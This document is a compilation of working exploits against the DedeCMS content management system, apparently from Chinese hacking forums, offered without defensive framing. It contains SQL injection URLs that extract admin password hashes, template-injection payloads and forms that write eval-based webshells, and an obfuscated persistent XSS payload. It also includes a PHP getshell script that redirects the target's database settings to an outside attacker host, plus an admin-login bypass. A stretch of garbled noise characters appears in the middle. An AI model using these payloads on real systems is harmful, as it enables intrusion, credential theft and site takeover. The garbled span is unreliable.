DedeCMS 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCMS v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php, a one-line webshell with password xiao.
DedeCMS 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The password returned is the 32-character MD5 with the first 5 and the last 7 characters removed, i.e. a 20-character MD5; to get the 16-character MD5, drop 3 more characters from the front and 1 from the end.
DedeCMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser and visit it; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; from then on, visiting either of the URLs below triggers our XSS no matter how the page is reached.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DedeCMS (织梦) variable override getshell
#!/usr/bin/php
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns the HTTP status line; "OK" past offset 12 means "HTTP/1.1 200 OK".
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// POST body: the _COOKIE[GLOBALS][cfg_db*] keys override the site's database
// settings, so mytag_js.php reads its mytag row from the database given here.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
return '';
}
fwrite($ock,$data);
// Only the first response line (the status line) is returned.
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you are taken straight into the site backend.
The precondition for this vulnerability is that the backend (admin directory) path must be known.
DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit using the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the URL typed into the doaction field before it is submitted.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, enter the member panel, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the crafted part)
</div>
<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, the template path has been changed.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is created in the plus directory.
DedeCMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
DedeCMS (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
s8 d* d I4 V% d0 u4 K$ d0 B
9 J& B& z* j$ h R! p9 L" c; B. y0 Z* @
, ?) x5 A/ [* k
5 F: W z3 ?6 t6 e# E# ?6 s
$ K; I7 H: z, j$ m9 l# M+ ]& v- W; C. Q* v7 h' a' c& g- z4 y2 H8 v
4 |' T7 n$ |) n& r2 ~+ |" ^1 ?
9 H& ~) v- E; _2 `( v6 r G, W& {. y* N
DedeCMS (织梦) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
DedeCMS (织梦) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric overflow that raises a database error, combined with DedeCMS writing database error messages into a PHP file without validating the file header.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Open test.html from dede.rar; note that the action address in the form is:
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.
DedeCMS (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*